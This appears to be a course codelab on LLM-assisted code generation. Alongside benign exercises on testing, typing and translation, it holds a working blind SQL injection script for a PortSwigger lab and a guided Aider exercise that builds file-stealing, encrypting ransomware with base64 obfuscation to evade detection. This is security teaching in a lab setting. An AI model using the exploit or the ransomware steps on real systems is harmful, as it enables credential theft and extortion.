In this week's exercises, your group will try out the various tasks for code generation using LLMs. Begin by completing the initial parts of the codelab. Then, attempt the exercise your group has been assigned in the following Google Slide presentation:
Add screenshots that you can use to walkthrough how you performed the exercise. Your group will present your results for the exercise during the last hour of class. After completing the exercise you've been assigned, continue to the rest of the exercises in order to prepare for the week's homework assignment.
Code generation is one of the more useful tasks a model can do. It's difficult to trust the code it produces without having an idea of what a correct version of the code looks like. In this exercise, a simple Python class that implements a username-password authentication function using a SQLite3 database is shown. Within the class:
users.db
' within the class constructor.initilizeUsers()
method of the class is performed which creates the users table with text fields: username and password. It then calls the addUser()
method to add the admin
username with the password of 'password123
'addUser()
method is implemented that takes a username and a password and inserts them into the database if the username does not exist in the database.checkUser()
method is implemented that takes a username and password, retrieves the password for the username from the database, then checks it against the given password. The method returns True
if they match, False
otherwise.import sqlite3
DB_FILE = 'users.db' # file for our Database
class Users():
def __init__(self):
self.connection = sqlite3.connect(DB_FILE)
cursor = self.connection.cursor()
try:
cursor.execute("select count(rowid) from users")
except sqlite3.OperationalError:
self.initializeUsers()
def initializeUsers(self):
cursor = self.connection.cursor()
cursor.execute("create table users (username text, password text)")
self.addUser('admin','password123')
def addUser(self, username, password):
cursor = self.connection.cursor()
params = {'username':username}
cursor.execute("SELECT username FROM users WHERE username=(:username)", params)
res = cursor.fetchall()
if len(res) == 0:
params = {'username':username, 'password':password}
cursor.execute("insert into users (username, password) VALUES (:username, :password)", params)
self.connection.commit()
return True
else:
return False
def checkUser(self, username, password):
params = {'username':username}
cursor = self.connection.cursor()
cursor.execute("select password from users WHERE username=(:username)", params)
res = cursor.fetchall()
if len(res) != 0:
password_from_db = res.pop()[0]
if password == password_from_db:
return True
return False
The goal of the exercise is to generate a prompt that allows an LLM to produce
Unit tests that are built into a program allow one to catch code changes that may break the functionality of the application. For example, consider the code below that implements a square root.
import math
def square_root(n):
if isinstance(n, int) and n >= 0:
return math.sqrt(n)
else:
raise ValueError("Input must be a positive integer.")
To add unit tests to this code, one could utilize the unittest
package in Python and add assertions that should hold on a variety of test cases. An example is shown below
class TestSquareRoot(unittest.TestCase):
def test_zero(self):
self.assertEqual(square_root(0), 0.0)
def test_non_integer(self):
with self.assertRaises(ValueError):
square_root(4.5)
with self.assertRaises(ValueError):
square_root("string")
with self.assertRaises(ValueError):
square_root([4])
def test_negative_integer(self):
with self.assertRaises(ValueError):
square_root(-1)
if __name__ == "__main__":
unittest.main()
For our password authentication example, we wish to test the expected behavior of the code across a variety of tests to ensure correctness. For example, the code should:
password123
'While one could generate these tests manually, an LLM may be able to generate them instead.
Python versions beyond 3.5 support type annotations in order to give the developer the ability to reason about data types within their programs. Adding type annotations to code written prior to this version is something that can be potentially automated by an LLM. Consider the code below that fetches a URL using the requests
package, parses the page using BeautifulSoup
, and then returns the page's <title
> tag if it exists.
import requests
from bs4 import BeautifulSoup
def getUrlTitle(url):
resp = requests.get(url)
title_tag = BeautifulSoup(resp.text, 'html.parser').find('title')
if title_tag and title_tag.text:
return title_tag.text.strip()
else:
return None
A fully annotated version is shown below with each parameter and return value assigned a type, along with any variable that has been utilized. In addition, the Optional
type is used when the return type can be either the given type (e.g. str
) or None
.
import requests
from bs4 import BeautifulSoup
from typing import Optional
def getUrlTitle(url: str) -> Optional[str]:
resp: requests.Response = requests.get(url)
resp.raise_for_status()
soup: BeautifulSoup = BeautifulSoup(resp.text, 'html.parser')
title_tag: Optional[BeautifulSoup.Tag] = soup.find('title')
if title_tag and title_tag.text:
return title_tag.text.strip()
else:
return None
With the code given previously for the password authentication program
One of the potential uses for a code-based LLM is to take existing code and implement new functionality. Consider the code below that sequentially downloads URLs and pulls out their <title
> tags.
def getUrlTitle(url):
resp = requests.get(url)
title_tag = BeautifulSoup(resp.text, 'html.parser').find('title')
...
def getSequential(urls):
titles = []
for u in urls:
titles.append(getUrlTitle(u))
return(titles)
urls =
print(getSequential(['https://pdx.edu', 'https://oregonctf.org']))
One can convert the code to use asynchronous calls as shown below using an LLM
async def getUrlTitle(session, url):
async with session.get(url) as resp:
html = await resp.text()
title_tag = BeautifulSoup(html, 'html.parser').find('title')
...
async def getAsync(urls):
async with aiohttp.ClientSession() as session:
tasks = [getUrlTitle(session, url) for url in urls]
titles = await asyncio.gather(*tasks)
return titles
print(asyncio.run(getAsync(['https://pdx.edu', 'https://oregonctf.org'])))
The prior password program utilizes cleartext passwords in its implementation instead of a password hash of it. Unfortunately, if the system were compromised, cleartext passwords for every user would be exposed, allowing an adversary to perform credential stuffing. Given the original password code:
LLMs have been successfully used to translate text from one language to another. Since programming languages are just another type of language, one potential use for LLMs is to automatically translate a program to another programming language.
In this exercise, we'll translate our original password code written in Python into Javascript. We'll begin by asking an LLM to create a Javascript equivalent for the password program. As part of the prompt, give the LLM some additional instructions to guide its translation such as:
sqlite3
moduleUsing the above as a guide,
To run the code, bring up the course VM and install the latest Node.js version.
sudo apt update -y
sudo apt install nodejs npm -y
sudo npm install -g n
sudo n stable
hash -r
Create a directory to run the application from, and install the Javascript packages that are required.
mkdir js
cd js
npm install sqlite3
Copy the code the LLM produced into the file users.js
. Then, run the code.
node users.js
We'll attempt to repeat the exercise using Typescript instead.
Install the Typescript package
npm install ts-node
Copy the code the LLM produced into the file users.ts. Then, run the npx
command to transpile the code to Javascript and execute it.
npx ts-node users.js
LLMs can be used to rapidly speed up the process of exploit development. Open the Portswigger level https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses. After reading the lab description and the hint click the access the lab button. The level has a SQL injection vulnerability in its tracking cookie (TrackingID
) that allows one to exfiltrate the password for the administrator account programmatically. The code below performs a brute-force linear search on each character of the password in order to solve the level.
import requests
from bs4 import BeautifulSoup
import time
import urllib.parse
def test_string(url, prefix, letter):
query = f"x' union select 'a' from users where username = 'administrator' and password ~ '^{prefix}{letter}'--"
print(f'Testing ^{prefix}{letter}')
mycookies = {'TrackingId': urllib.parse.quote_plus(query)}
resp = requests.get(url, cookies=mycookies)
soup = BeautifulSoup(resp.text, 'html.parser')
if soup.find('div', text='Welcome back!'):
print(f'Found character {letter}')
return True
else:
return False
site = ''
url = f'https://{site}/'
start_alpha = 'abcdefghijklmnopqrstuvwxyz0123456789'
prefix = ''
begin_time = time.perf_counter()
while True:
if test_string(url, prefix, '$'):
break
for letter in start_alpha:
check = test_string(url, prefix, letter)
if check:
prefix += letter
break
print(f'Password is {prefix}')
print(f"Time elapsed is {time.perf_counter()-begin_time}")
As part of the homework assignment, students create a version of the prior program that performs a binary search instead of a linear search, thus reducing the run-time for finding each character of the password from O(n)
where n
is the number of characters in the character set to O(n log n)
. For example, the following injection utilizes the ~
operator in SQL to perform a regular expression search on the first letter of the administrator's password.
charset = string.ascii_lowercase + string.digits
query = """x' UNION SELECT username from users where username = 'administrator' and password ~ '^[{charset[:mid]}]' --"""
Using the linear search program and instructing the LLM to generate a program that implements a binary search algorithm per character using the ~ operator,
Another task an LLM may help with is to generate regular expressions based on strings that a user supplies. Consider the strings below that are used to polymorph the User-Agent:
HTTP header in an attempt to evade detection. Filtering software could be configured with a singular regular expression that covers all of these strings.
We4b58
We7d7f
Wea4ee
We70d3
Wea508
We6853
We3d97
We8d3a
Web1a7
Wed0d1
We93d0
Wec697
We5186
We90d8
We9753
We3e18
We4e8f
We8f1a
Wead29
Wea76b
Wee716
Query the LLM to see if it is able to generate a Python regular expression that matches all of the strings above. Then visit https://regex101.com/ to validate the expression against the data provided.
There are limits to how accurately a model can perform this task. Repeat the task, but insert strings that can cause the LLM to produce an incorrect result.
When an application takes input controlled by an end user and uses it within the application, it must either be properly encoded (where sensitive characters are converted into innocuous ones) or filtered (where sensitive characters are simply removed). Without doing so, attacks such as command injection, SQL injection, and cross-site scripting (XSS) can occur. In this exercise, we will examine an LLMs ability to produce code that performs appropriate encoding and filtering.
The algorithm that should be applied is dependent upon the context in which the input is used in the application, leading the developer to encode different characters based on where the input is consumed. In this exercise, a string named user_input
whose value is given by the user. Prompt an LLM to generate Python code that encodes user_input
so it can be:
f''
)f'
https://foo.com/?name={user_input
}'
)Another approach to sanitize input is to filter sensitive characters completely. Similar to before, prompt an LLM to generate Python code that filters user_input so that it can be:
f''
)f'
https://foo.com/?name={user_input
}'
)Because of the ability of modern LLMs to produce code, there are many tools that help integrate their use in the development process. For example, Github Copilot is often utilized within VSCode in order to provide in-line code generation within a developer's coding environment. One such tool for producing code is Aider: a software engineering assistant that provides a pair programming experience with an LLM. Developers interact with Aider via a command line interface. Two of Aider's features that make it useful are its modification of local git repos for better control over code modifications as well as the use of Tree Sitter, a program that parses code and builds concrete syntax trees. In this exercise Aider will be used to assist in the incremental development of a ransomware/leakware program that scans the file system for PDFs and Microsoft Word Documents, saves them in a zip file, uploads the zip file to a web server, encrypts the zip file using a key, and then deletes the original files.
Use the web console to bring up an ssh
session on your virtual machine. We'll be needing multiple ssh
sessions on our VM to perform the lab. To support multiple sessions in a single terminal, we can utilize tmux
: a terminal multiplexer. tmux
utilizes keyboard shortcuts that are triggered after hitting Ctrl+b
to navigate multiple terminals within a single window. To start a tmux
session, run it in the terminal.
tmux
To create a new terminal the command is:
Ctrl+b
followed by c
As can be seen by the lower tabs on the screen, there are now two multiplexed terminals active. You can now switch between them by using the command:
Ctrl+b
followed by the terminal number you want to switch to (e.g. 0
or 1
)tmux
sessionUse the web console to bring up an ssh
session on your virtual machine. Change into the source directory containing the examples, create a virtual environment, activate it, and install the packages.
cd cs410g-src/08* git pull virtualenv -p python3 env source env/bin/activate pip install -r requirements.txt
Then, run the web application in the directory. This application runs a simple upload server that your generated program will upload files to.
python3 simple_http_server.py
Iconify the ssh window as you complete the rest of the exercise.
tmux
sessionCreate a new terminal using Ctrl+b
followed by c.
Create a directory for your application, then create a virtual environment with Aider installed in it.
mkdir -p ~/Aider/malware
cd ~/Aider/malware
python3 -m venv env
source env/bin/activate
pip install aider-chat
We'll now need to set up an environment variable named GEMINI_API_KEY
that contains the same value as the GOOGLE_API_KEY
you have set previously. Note that Aider offers usage with OpenAI and Anthropic, as well as other providers.
export GEMINI_API_KEY=$GOOGLE_API_KEY
Finally, launch Aider:
aider --model gemini/gemini-1.5-pro-latest
Note that, If you want to select more models you can also use the /models
command once the Aider chat has started and change the model part way through. Aider also has a handy help menu if you wish to explore. To do so, type the following into the chat:
/help
/help
: Use to view helpful commands
/test
: run a command line command and automatically include the output if it returns an error
/run
: run a command line command and optionally choose to add it to chat
/clear
: clear the chat tokens. This will unclutter the chat space of your previous messages
/drop
: Remove file matching search string, defaults to all files if no string
/add
: Add a file to the chat context
/tokens:
Reports the number of tokens used in the current chat context
/diff
: Display the diff of the last Aider commit
/undo
: Undo the last commit if it was made by Aider
/ls
: list current files in chat context
/exit
: Exit the current Aider session
Now it is time to have Aider make the first git commit:
find_pdfs
that takes a directory as an argument and searches for PDFs in the local file system"Check that the code was committed:
/diff
(Note: If the /diff
command produces an error. Start aider again with the same model. Then use /add
find_pdfs.py
to add the created file back into Aider's context. Then use /git add find_pdfs.py
to track the file)
Now that it has been verified that Aider made a local commit, it would be nice to have a way to test the function that Aider created.
find_pdfs.py
file that runs the find_pdfs
function and prints the files it finds. It should take a command line argument for the directory."/drop
command to remove the file from the context and retry the same prompt above./diff
to check what Aider producedAider allows developers to run shell commands within an Aider session. This example will use this feature to test the script that was written. First find what file the course directory is in using the /run
command and ls
. Then run the script using the found directory
/run ls ~
/run python find_pdfs.py ~/cs410g-src
python_cheat_sheet.pdf
and msSecurity-compressed-extracted.pdf
To efficiently load the files off the system, it is necessary to compress them.
create_pdf_zip
that creates a zip file of all the pdf files returned by find_pdfs
and save it to /tmp/foo.zip
. The function should be called when executing the Python script"/diff
to make sure the code looks correctNow to test the that the file is being created in the correct location Aider can be used to make unit tests:
find_pdfs
file, make a new file that contains unit tests for both the create_pdf_zip
and find_pdfs
function."/diff
to see what file it madeThe next step for a data ransomware campaign might be to exfiltrate the files from the target system to a server that the adversary controls. Modify the current project using Aider to add this functionality.
create_pdf_zip
function and upload it to http://127.0.0.1:5000/upload using an HTTP POST request. The endpoint accepts file objects. Use the Python requests package." /diff
to check that it looks correctNow test the script that Aider wrote by using the /test
command. This will add the output to the chat:
/test python find_pdfs.py <course home directory>
A ransomware payload would want to make the exfiltrated files unusable to the target so that the target administrators are forced to pay a ransom in order to decrypt their files. This could be done using either asymmetric or symmetric encryption. This exercise will use symmetric encryption so that the encryption key and decryption key are the same.
create_pdf_zip
function so that it will use the Python cryptography package to encrypt the contents of the zip file and save it as /tmp/foo.zip.enc
. Send the encrypted file as a post request to http://127.0.0.1:5000/upload
. Then send the encryption key as a post request to http://127.0.0.1:5000/upload
as a file called key"requirements.txt
file that contains the necessary Python packages to run the script"Install the dependencies (e.g. do not add them to the chat), and run the script:
/run pip install -r requirements.txt
/test python find_pdfs.py ~/cs410g-src
foo.zip
file and a key file in the uploads directoryfoo.zip.enc
is present in the /tmp
directoryTo make the ransomware harder to detect it can be useful to create variants of the code that have identical functionality.
find_pdfs
so that the function call strings are encoded using base64 and the code is still identical in functionality."